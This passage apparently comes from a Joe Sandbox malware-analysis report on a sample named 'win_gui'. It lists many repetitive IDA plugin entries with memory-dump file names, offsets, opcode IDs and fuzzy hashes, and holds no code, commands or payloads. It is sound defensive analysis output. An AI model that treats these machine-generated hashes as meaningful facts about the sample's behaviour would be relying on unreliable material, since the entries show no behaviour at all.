                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: abba40140d220d981e92e0e2b454f72673e2f2aeffcff5a497dbc2f27e84b947
                                  • Instruction ID: ea687ee7a75f0d5ae8bf718197cce764a5de47aa16209cfa473f9a93f1566742
                                  • Opcode Fuzzy Hash: abba40140d220d981e92e0e2b454f72673e2f2aeffcff5a497dbc2f27e84b947
                                  • Instruction Fuzzy Hash: 694262B17141614BDB0CDF16E8B003AB7A3ABDE301746862DDA475B791C634BA15CFE4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0eb59dee6d3e119db8b466b11e17779a64a4fad77ae0a839475259d5e2408d69
                                  • Instruction ID: 9ed9120f8196f388cc64e6302ac1bf9eef6fa9f0169fcd3639a98254c22fb473
                                  • Opcode Fuzzy Hash: 0eb59dee6d3e119db8b466b11e17779a64a4fad77ae0a839475259d5e2408d69
                                  • Instruction Fuzzy Hash: 68326C2120C3D58FD71ACA7D48A01AFFFE19AEB240F584A9EF5D487343C565C609DBA2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a1566ac7965f74862ca2d7e85da782d71d136d1334abe135f5876c6ee6f03a72
                                  • Instruction ID: 0cb8baf30508d8e22daa5cfa454f0b93de33e83b86e6d5bdf9a19052e7133d75
                                  • Opcode Fuzzy Hash: a1566ac7965f74862ca2d7e85da782d71d136d1334abe135f5876c6ee6f03a72
                                  • Instruction Fuzzy Hash: E8323E727483158FC708CE5DDC9069AB3E2BFC8304F29893DE45AD7741E7B5E94A8A81
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 50e1839067a938a4340039a17895e1a35278b9cbb531771d311e27b929ed62b4
                                  • Instruction ID: 8edfa012f4117d164b0d4765ca11b76739ae01dc17df8a6c8e5ec5bbb87fb512
                                  • Opcode Fuzzy Hash: 50e1839067a938a4340039a17895e1a35278b9cbb531771d311e27b929ed62b4
                                  • Instruction Fuzzy Hash: 73121411315FC58FD315CA7D889065AFED2ABA6200B8C8A7DD4C6DBB83C514F919C7E1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2d32bf8ab148941b6d9d91e9a60e4534f3456b7a10854289aea402d7066131d8
                                  • Instruction ID: c058209b8c4717a5c6027022253fb73c429dbcc90ab7b75b30db0ef50c6b1596
                                  • Opcode Fuzzy Hash: 2d32bf8ab148941b6d9d91e9a60e4534f3456b7a10854289aea402d7066131d8
                                  • Instruction Fuzzy Hash: FDB124719087459FC304CF29C58195AFBE1BFDC304F498A6EF99997311EB31EA858B82
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6e12b81214d4a7d077bc5d771171d2a3e04aead513d4197413232fe679292300
                                  • Instruction ID: 503c6f80ab6621606d3aae6f1f33a91ea4485fb0cd0714c9c40eacd8e488f781
                                  • Opcode Fuzzy Hash: 6e12b81214d4a7d077bc5d771171d2a3e04aead513d4197413232fe679292300
                                  • Instruction Fuzzy Hash: ADA1FF2271A6C79FC30D8E6D48405A9FF617B7610074887DEE8C5EB783C514EAA9C7E2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8af4c617d603d11af004d9323865fed94134523c91e675b7418ad38d9a00f7d3
                                  • Instruction ID: 747e4f9165c8f15ad6e89e549ef81dce02fe641e37ee3f6a2e6501359b9542d3
                                  • Opcode Fuzzy Hash: 8af4c617d603d11af004d9323865fed94134523c91e675b7418ad38d9a00f7d3
                                  • Instruction Fuzzy Hash: 0EA1A0715087858FC754CF38C4805ABFBE5FF89304F484A6EE48A87252EB31EA85CB46
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6b5048d7c5f536816e1701ffa52fdb1d5e74d887dca5545488f9d6a3246464b2
                                  • Instruction ID: 0a2d9c891e85d183a1c102d51f651c268ecaadeff275b5a2bb028d9f0aedc69f
                                  • Opcode Fuzzy Hash: 6b5048d7c5f536816e1701ffa52fdb1d5e74d887dca5545488f9d6a3246464b2
                                  • Instruction Fuzzy Hash: DFA185B6E006189FCB48CFA9D88099DBBF2FF88314B65816ED405E7315D731AA46CF94
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2210fb0df7ea5e66a09918cfe53dfb6df9d85d8f767804b522df86a94263095e
                                  • Instruction ID: 6fd6042fbee53b160533628f89eb214061f29fd4b2038fca6f2f59f176e395c4
                                  • Opcode Fuzzy Hash: 2210fb0df7ea5e66a09918cfe53dfb6df9d85d8f767804b522df86a94263095e
                                  • Instruction Fuzzy Hash: 389147715047459FC324CF29C89099BBBF5FF99304B488A6EE4EA87702D334EA59CB91
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 44dadba5f5b0bf06e8d110b26323a92d4e57698b12cba6534ff322fd24986856
                                  • Instruction ID: 459cee46a5b650a0453df2685b3bf650e1b20308d8710a8c5b2484d0797f2a8f
                                  • Opcode Fuzzy Hash: 44dadba5f5b0bf06e8d110b26323a92d4e57698b12cba6534ff322fd24986856
                                  • Instruction Fuzzy Hash: 369192715087458FC715CF28C4806AFBBE6BFD9314F584A2EE5CA83211EB31E988CB56
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4a9a0e797c342399e34e98d094e501e0906e853463f109999c45674e4538daaf
                                  • Instruction ID: 60e9a83369cf1aca226b4dc7c35a72269da40ce3c366176c7779635e3007c7fb
                                  • Opcode Fuzzy Hash: 4a9a0e797c342399e34e98d094e501e0906e853463f109999c45674e4538daaf
                                  • Instruction Fuzzy Hash: 899139715087559FC728CF29C8809A7BBE5EF59300F488A6EE4EA87742D734EA09CB51
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 19d8d3a74e41525cb6b25716e72432dcdfb1029fa5557632fc5c1e23903eedf9
                                  • Instruction ID: f6a4526410040930e110e219448ed56810a81cc0c17cf79f7a55faa9fc169eec
                                  • Opcode Fuzzy Hash: 19d8d3a74e41525cb6b25716e72432dcdfb1029fa5557632fc5c1e23903eedf9
                                  • Instruction Fuzzy Hash: 628198719083529FC750CF29C5804AAFBE1EF9A304F484E6DF8D587316D371AA59CB92
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cb8fef9dd76e75eb59c1eeb2f4050ea4eab3c9300ee64cd0e51d0289dce21143
                                  • Instruction ID: 4fbb6902774bdf240ded9ec924827fd9e133ff3bc3b548aad9e8ae97a484de34
                                  • Opcode Fuzzy Hash: cb8fef9dd76e75eb59c1eeb2f4050ea4eab3c9300ee64cd0e51d0289dce21143
                                  • Instruction Fuzzy Hash: DE61CD756006168FDB14DF28C88076AB7E2FB85311F58867CED869B391D730EA4ACB81
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bb4a44cd68f332532bf460d6c6159c21a79f85cf94175ce79af39b36b57629ec
                                  • Instruction ID: 13dcf64b49018b3dba2be6be19f6b0777007b166c2b868174b6a2c9349ba4d96
                                  • Opcode Fuzzy Hash: bb4a44cd68f332532bf460d6c6159c21a79f85cf94175ce79af39b36b57629ec
                                  • Instruction Fuzzy Hash: 717190715087508FC325CF69C880AABFBE5EF95304F484A6EF4DA87742D634E648CB56
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3b21ec426f0837e7178fbdc36cbf073d6167929d3b1517ee8b94fbab9c47e283
                                  • Instruction ID: a5d08329ae39d2632e4fb9c9201031c0f80f82e66ac5e5c3b2d3916169e70bb0
                                  • Opcode Fuzzy Hash: 3b21ec426f0837e7178fbdc36cbf073d6167929d3b1517ee8b94fbab9c47e283
                                  • Instruction Fuzzy Hash: FE7190715087818FC725CF69C8809ABFBE5EF99304F088A1EF4DA87742D234E659CB52
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 15b9dda0541a99522dce4cfe0ca254a03972315f85e0cfe0e3b9546fe90d1ca7
                                  • Instruction ID: 087ff175f7a814f5e8c56793c7f477b79a29570618c9067444971601e111b2cb
                                  • Opcode Fuzzy Hash: 15b9dda0541a99522dce4cfe0ca254a03972315f85e0cfe0e3b9546fe90d1ca7
                                  • Instruction Fuzzy Hash: 587149715083418FC714CF28C490A6BFBE6FF99314F494A6EE4DA97252D730EA49CB92
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 24bf6ca59906327bcb6bb96c8b82c28d40c21f0e9f9a4e2d6fde6f7528dc494a
                                  • Instruction ID: 71a95d09b267bcac18e55f039ed394ce4488a16830f8c947fe6707a33cc68dc2
                                  • Opcode Fuzzy Hash: 24bf6ca59906327bcb6bb96c8b82c28d40c21f0e9f9a4e2d6fde6f7528dc494a
                                  • Instruction Fuzzy Hash: DA519D769187468FD708CF19C881A6AB7E1FBC9304F845A2DF986DB311DB35E904CB82
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c564dbef58c7cec768969ebabfc350099b5a318604feb1bb02d60d28d3e8f1fe
                                  • Instruction ID: 8a498f61cc039ffe6dfd78a2aa4062ecbcb4d9c763f3576338942dba43c2af30
                                  • Opcode Fuzzy Hash: c564dbef58c7cec768969ebabfc350099b5a318604feb1bb02d60d28d3e8f1fe
                                  • Instruction Fuzzy Hash: 8861AF71604B958AD321CF7CC884797BBE1AF95204F08CA6DD4D68B742E775E689C780
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d199e7f460cb947f71329062d2e1880fbd41d43ace80041f2f10419b9e668a92
                                  • Instruction ID: 85ae212969375d5dd68ef7d6f5717f8cde8ce436e64d62f3119c0353b247c909
                                  • Opcode Fuzzy Hash: d199e7f460cb947f71329062d2e1880fbd41d43ace80041f2f10419b9e668a92
                                  • Instruction Fuzzy Hash: E0411D316593458FC304CF6DC88055AFBE1EF99218F4DC6ADE4889B302D276E90BCB96
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
